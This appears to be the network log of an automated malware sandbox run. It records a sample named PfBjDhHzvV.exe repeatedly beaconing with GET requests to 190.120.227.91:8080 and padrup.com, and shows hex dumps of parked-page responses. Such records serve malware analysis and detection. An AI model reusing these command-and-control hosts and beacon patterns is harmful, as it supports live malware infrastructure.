                                                                                                                                                                                                                                  Data Raw: 31 65 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                  Data Ascii: 1e0<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:22.591438055 CEST203INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                  Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzEwMi4yMzc4Ojk3NmU2OGU5NGJlZDI2MTAyZTkwZThmM2ExNWM1OGIxOGYyZGMyYjIyZGI5ODNlOWRl
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:22.591449976 CEST1236INData Raw: 36 66 39 0d 0a 59 7a 68 6c 5a 44 6b 35 4d 6d 4d 78 59 6a 56 6a 5a 47 49 36 4e 6a 63 78 4d 6a 45 77 4e 6d 55 7a 59 54 42 6a 4f 41 3d 3d 27 3b 0a 76 61 72 20 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 20 3d 20 66 61 6c 73 65 3b 0a 76 61 72 20 74 68 65
                                                                                                                                                                                                                                  Data Ascii: 6f9YzhlZDk5MmMxYjVjZGI6NjcxMjEwNmUzYTBjOA==';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scr
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:22.591828108 CEST561INData Raw: 74 68 65 20 72 65 71 75 65 73 74 2e 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 78 68 72 2e 6f 70 65 6e 28 27 47 45 54 27 2c 20 70 61 74 68 20 2b 20 27 2f 6c 73
                                                                                                                                                                                                                                  Data Ascii: the request.'); } } } xhr.open('GET', path + '/ls.p' + 'hp?t=6712106e&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, '47814c0876aa29703c1c38468d63fdb1222eb49c');</scr


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49764 | 190.120.227.91 | 8080 | 7272 | C:\Users\user\Desktop\PfBjDhHzvV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 09:38:22.619852066 CEST | 166 | OUT | GET /sobakavolos.gif?c5c499=38882763 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
    Host: 190.120.227.91:8080
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49783 | 185.53.178.50 | 80 | 7272 | C:\Users\user\Desktop\PfBjDhHzvV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 09:38:26.999886990 CEST | 155 | OUT | GET /sobaka1.gif?14117e3=189388539 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
    Host: padrup.com
    Cache-Control: no-cache
Oct 18, 2024 09:38:28.058017969 CEST | 1236 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 18 Oct 2024 07:38:27 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    X-Redirect: skenzo
    X-Buckets: bucket102
    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_PZg3daHakumPAnjsInq1ooDme8Q8nSQHwPO4YgavrhRMnoZDftPE6wPbaLXCYVZWJti9ItiYlLRrpXRk/Zaetg==
    X-Template: tpl_CleanPeppermintBlack_twoclick
    X-Language: english
    Accept-CH: viewport-width
    Accept-CH: dpr
    Accept-CH: device-memory
    Accept-CH: rtt
    Accept-CH: downlink
    Accept-CH: ect
    Accept-CH: ua
    Accept-CH: ua-full-version
    Accept-CH: ua-platform
    Accept-CH: ua-platform-version
    Accept-CH: ua-arch
    Accept-CH: ua-model
    Accept-CH: ua-mobile
    Accept-CH-Lifetime: 30
    X-Pcrew-Ip-Organization: QuadraNet
    X-Pcrew-Blocked-Reason: hosting network
    X-Domain: padrup.com
    X-Subdomain:
    Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
    Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 09:38:28.058171988 CEST | 212 | IN | Data Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
    Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzEwNy43MDU6NzFmNmM3NGY0OGIwYjk2MDMxMTVhMTg3NWFmY2NmNzdmZDJjNjdhNTAxY2QyNTFiOTdlOGE0M2IwMjM
Oct 18, 2024 09:38:28.058183908 CEST | 1236 | IN | Data Raw: 7a 5a 44 6b 35 4f 54 6f 32 4e 7a 45 79 4d 54 41 33 4d 32 46 6a 4d 57 5a 6d 27 3b 0a 76 61 72 20 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 20 3d 20 66 61 6c 73 65 3b 0a 76 61 72 20 74 68 65 6d 65 64 61 74 61 20 3d 20 27 27 3b 0a 76 61 72 20 78 6b 77
    Data Ascii: zZDk5OTo2NzEyMTA3M2FjMWZm';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scriptPath = '';</sc
Oct 18, 2024 09:38:28.058574915 CEST | 548 | IN | Data Raw: 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 78 68 72 2e 6f 70 65 6e 28 27 47 45 54 27 2c 20 70 61 74 68 20 2b 20 27 2f 6c 73 2e 70 27 20 2b 20 27 68 70 3f 74 3d 36 37 31 32 31 30 37 33
    Data Ascii: } } } xhr.open('GET', path + '/ls.p' + 'hp?t=67121073&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, '37f1530768ab44b6cd73942902d822c64bf3a142fd2');</script><scrip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 49790 | 190.120.227.91 | 8080 | 7272 | C:\Users\user\Desktop\PfBjDhHzvV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 09:38:28.088912964 CEST | 167 | OUT | GET /sobakavolos.gif?15f8580=23037312 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
    Host: 190.120.227.91:8080
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 49813 | 185.53.178.50 | 80 | 7272 | C:\Users\user\Desktop\PfBjDhHzvV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 09:38:32.303198099 CEST | 154 | OUT | GET /sobaka1.gif?1edc267=64718030 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
    Host: padrup.com
    Cache-Control: no-cache
Oct 18, 2024 09:38:33.454242945 CEST | 1236 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 18 Oct 2024 07:38:33 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    X-Redirect: skenzo
    X-Buckets: bucket102
    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_OAQafcsSPpriwLn4Vap3xaDSeOzLAVW6U3wOZ8H9z+vmS1RUL/cZXn3fsD53xJ4fwq3FHe9V+62+eBWlBD2mDA==
    X-Template: tpl_CleanPeppermintBlack_twoclick
    X-Language: english
    Accept-CH: viewport-width
    Accept-CH: dpr
    Accept-CH: device-memory
    Accept-CH: rtt
    Accept-CH: downlink
    Accept-CH: ect
    Accept-CH: ua
    Accept-CH: ua-full-version
    Accept-CH: ua-platform
    Accept-CH: ua-platform-version
    Accept-CH: ua-arch
    Accept-CH: ua-model
                                                                                                                                                                                                                                  Accept-CH: ua-mobile
                                                                                                                                                                                                                                  Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                  X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                  X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                  X-Domain: padrup.com
                                                                                                                                                                                                                                  X-Subdomain:
                                                                                                                                                                                                                                  Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                  Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:33.454354048 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                  Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzExMy4xMTU5OmYzYjMwYzhlY2MwMzdhMDNjYjhlN2ZlNWQ5MjI5NWU4NDE1YTlmNzk0ZmE3ZjljZWQwMjYzMDA1YWM0NGEyNjk6NjcxMjEwNzkxYzRhNw==';
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:33.454370022 CEST424INData Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
                                                                                                                                                                                                                                  Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:33.454628944 CEST340INData Raw: 0d 0a 31 34 36 0d 0a 66 33 62 37 36 66 65 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e
                                                                                                                                                                                                                                  Data Ascii: 146f3b76fe');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.7 | 49824 | 190.120.227.91 | 8080 | 7272 | C:\Users\user\Desktop\PfBjDhHzvV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 09:38:33.469178915 CEST | 167 | OUT | GET /sobakavolos.gif?212b208=34779656 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.7 | 49845 | 185.53.178.50 | 80 | 7272 | C:\Users\user\Desktop\PfBjDhHzvV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 09:38:37.707685947 CEST | 155 | OUT | GET /sobaka1.gif?2a0a14c=132244452 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 09:38:38.799633980 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 07:38:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_J29tlYYQBaLRgwl+e7xuCY96xZ7/enTqQ1nkwIw8396t3bvZUtsJJ/EfATZHITtHZrxQtGQ1nzdAKc41wH0joQ==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 09:38:38.799752951 CEST | 224 | IN | Data Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzExOC40MzQ6NTkxY2U1NmFhMWE0MzMwYTQxMjdhODljMjIzNGJhZGNhOGFjNDI1MTIyMDYxNDA4Yzg5NWQ0YjdjZTNiZjUxMTo2NzE
Oct 18, 2024 09:38:38.799839020 CEST | 1236 | IN | Data Raw: 79 4d 54 41 33 5a 54 59 35 5a 6a 4e 68 27 3b 0a 76 61 72 20 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 20 3d 20 66 61 6c 73 65 3b 0a 76 61 72 20 74 68 65 6d 65 64 61 74 61 20 3d 20 27 27 3b 0a 76 61 72 20 78 6b 77 20 3d 20 27 27 3b 0a 76 61 72 20 78
Data Ascii: yMTA3ZTY5ZjNh';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scriptPath = '';</script><scr
Oct 18, 2024 09:38:38.800071001 CEST | 536 | IN | Data Raw: 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 78 68 72 2e 6f 70 65 6e 28 27 47 45 54 27 2c 20 70 61 74 68 20 2b 20 27 2f 6c 73 2e 70 27 20 2b 20 27 68 70 3f 74 3d 36 37 31 32 31 30 37 65 26 74 6f 6b 65 6e 3d 27 20 2b 20 65
Data Ascii: } } xhr.open('GET', path + '/ls.p' + 'hp?t=6712107e&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, 'cdc09f5584d459c864a06c10124b178a807c4142a02');</script><script type='text


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.7 | 49851 | 190.120.227.91 | 8080 | 7272 | C:\Users\user\Desktop\PfBjDhHzvV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 09:38:38.828929901 CEST | 168 | OUT | GET /sobakavolos.gif?2bf5c9b=276573090 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.7 | 49881 | 185.53.178.50 | 80 | 7272 | C:\Users\user\Desktop\PfBjDhHzvV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 09:38:43.152618885 CEST | 155 | OUT | GET /sobaka1.gif?3467cb5=274755465 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 09:38:44.218116999 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 07:38:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_UcF6yvWW25M0sB+iCVWMx+bBfLNX7x4vE7bglqjTRZxtNxNV0wdoH3Uue8WWpUgcrYniZrD2N/3BZyspoHxEBQ==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
                                                                                                                                                                                                                                  Accept-CH: ua-model
                                                                                                                                                                                                                                  Accept-CH: ua-mobile
                                                                                                                                                                                                                                  Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                  X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                  X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                  X-Domain: padrup.com
                                                                                                                                                                                                                                  X-Subdomain:
Data Ascii: 1e0<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 09:38:44.218306065 CEST  203   IN  Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzEyMy44ODMyOjc4NWM3OTYxZmFiZGIyMmY2NDgxNWM0YjIyNmJjZDk1MGQ1ZGY0NWJkNjg1NTgzZTgw
Oct 18, 2024 09:38:44.368341923 CEST  1236  IN  Data Ascii: 6f9MjFhNWE0NGI4ZWZkZTQ6NjcxMjEwODNkN2EwMw==';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scr
Oct 18, 2024 09:38:44.368590117 CEST  561   IN  Data Ascii: the request.'); } } } xhr.open('GET', path + '/ls.p' + 'hp?t=67121084&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, '00afc74c6f86a4769cc815d1723cbb5c8e5d6777');</scr


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
11          192.168.2.7  49888        190.120.227.91  8080              7272  C:\Users\user\Desktop\PfBjDhHzvV.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 18, 2024 09:38:44.390918970 CEST  168                OUT        GET /sobakavolos.gif?36c07fa=459292624 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
    Host: 190.120.227.91:8080
    Cache-Control: no-cache


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
12          192.168.2.7  49913        185.53.178.50   80                7272  C:\Users\user\Desktop\PfBjDhHzvV.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 18, 2024 09:38:48.688736916 CEST  155                OUT        GET /sobaka1.gif?3f9f77c=600421212 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
    Host: padrup.com
    Cache-Control: no-cache
Oct 18, 2024 09:38:49.758708000 CEST  1236               IN         HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 18 Oct 2024 07:38:49 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    X-Redirect: skenzo
    X-Buckets: bucket102
    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_q1S7DbsdsTeCX6kj1aldVLI3vsZW/iGZdZRQbafKPu6E/vj9Rod65AEECMs5YmaOhwF78uLnK6IYq5MrhG9dOQ==
    X-Template: tpl_CleanPeppermintBlack_twoclick
    X-Language: english
    Accept-CH: viewport-width
    Accept-CH: dpr
    Accept-CH: device-memory
    Accept-CH: rtt
    Accept-CH: downlink
    Accept-CH: ect
    Accept-CH: ua
    Accept-CH: ua-full-version
    Accept-CH: ua-platform
    Accept-CH: ua-platform-version
    Accept-CH: ua-arch
    Accept-CH: ua-model
    Accept-CH: ua-mobile
    Accept-CH-Lifetime: 30
    X-Pcrew-Ip-Organization: QuadraNet
    X-Pcrew-Blocked-Reason: hosting network
    X-Domain: padrup.com
    X-Subdomain:
    Data Ascii: 1e0<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 09:38:49.758846998 CEST  1236  IN  Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzEyOS40MjUzOmFhMGY1MjkzNTE2NWJhMWI3MzhkNTFkZTE4NGM5MjVmN2YyZDBiNGNhMDUxMzZlZThj6f9ZWY1MGIzMzEwYzE4MmQ6NjcxMjEwODk2N2Q
Oct 18, 2024 09:38:49.758862972 CEST  764   IN  Data Ascii: t.trim() === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } }


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
13          192.168.2.7  49922        190.120.227.91  8080              7272  C:\Users\user\Desktop\PfBjDhHzvV.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 18, 2024 09:38:49.776119947 CEST  168                OUT        GET /sobakavolos.gif?4194e9e=343836950 HTTP/1.1
